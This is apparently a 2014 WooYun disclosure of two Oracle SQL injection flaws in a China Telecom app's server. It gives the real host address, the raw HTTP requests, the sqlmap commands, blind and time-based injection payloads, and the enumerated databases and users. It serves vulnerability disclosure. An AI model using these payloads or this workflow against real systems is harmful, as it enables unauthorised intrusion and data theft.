乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-08: 细节已通知厂商并且等待厂商处理中 2014-09-12: 厂商已经确认,细节仅向厂商公开 2014-09-22: 细节向核心白帽子及相关领域专家公开 2014-10-02: 细节向普通白帽子公开 2014-10-12: 细节向实习白帽子公开 2014-10-23: 细节向公众公开
中国电信某APP服务端Oracle数据库两处注射
从豌豆荚下载中国电信的"天翼用户中心"APP
注射点1
打开应用后抓包发现这么一条请求:
GET /commonserver/query?sid=115&restype=json&cenx=0.0&ceny=0.0&key=eb55fbb0caf8622ce0b14c4d06ae62ab6e62694629350804a152f35fbef4117a6a434deee760dee9 HTTP/1.1Host: 116.228.55.155:6060Connection: Keep-AliveUser-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
其中key参数存在SQL注射。
注射点2
与注射点1同IP的一个管理后台登录页存在SQL注射
POST /busmaintainsystem/admin/login/loginaction.php HTTP/1.1Content-Length: 99Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://116.228.55.155:8802/Cookie: PHPSESSID=bf86kl6tb39b6cvp0vjob3idi2Host: 116.228.55.155:8802Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*account=1&action=login&password=2
account参数存在SQL注射。
[注射点1] sqlmap.py -r e:\1.txt --dbs --current-user
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: key Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: sid=115&restype=json&cenx=0.0&ceny=0.0&key=eb55fbb0caf8622ce0b14c4d06ae62ab6e62694629350804a152f35fbef4117a6a434deee760dee9' AND 6763=6763 AND 'KsXs'='KsXs Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: sid=115&restype=json&cenx=0.0&ceny=0.0&key=eb55fbb0caf8622ce0b14c4d06ae62ab6e62694629350804a152f35fbef4117a6a434deee760dee9' AND 5155=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(107)||CHR(119)||CHR(74),5) AND 'zqSt'='zqSt---web server operating system: Windowsweb application technology: Apache 2.2.22back-end DBMS: Oraclecurrent user: 'CXL_POI'available databases [18]:[*] BESTTONE[*] CTXSYS[*] CXL_POI[*] CXL_POI_EXCHANGE[*] EXFSYS[*] GEOCODINGTESTSDE[*] HB_MAP_ATTRIBUTE[*] HB_MAP_SDE[*] HB_POI[*] HB_PRODUCE_PREPARE[*] HB_PRODUCE_RESULT[*] HB_PRODUCE_SOURCE[*] KNOWLEDGE[*] MDSYS[*] OLAPSYS[*] SDE[*] SYS[*] SYSTEM
[注射点2] sqlmap.py -r e:\3.txt --dbs --current-user
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: account Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: account=1' AND 3751=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(82)||CHR(85)||CHR(68),5) AND 'dlnL'='dlnL&action=login&password=2---web server operating system: Windowsweb application technology: Apache 2.2.22, PHP 5.4.3back-end DBMS: Oraclecurrent user: 'CXL_POI_EXCHANGE'available databases [1]:[*] CXL_POI_EXCHANGE
电信更专业
危害等级:高
漏洞Rank:15
确认时间:2014-09-12 17:08
CNVD确认并复现所述漏洞情况,已经转由CNCERT直接通报给中国电信集团公司处置。 按多个漏洞评分,rank 15
暂无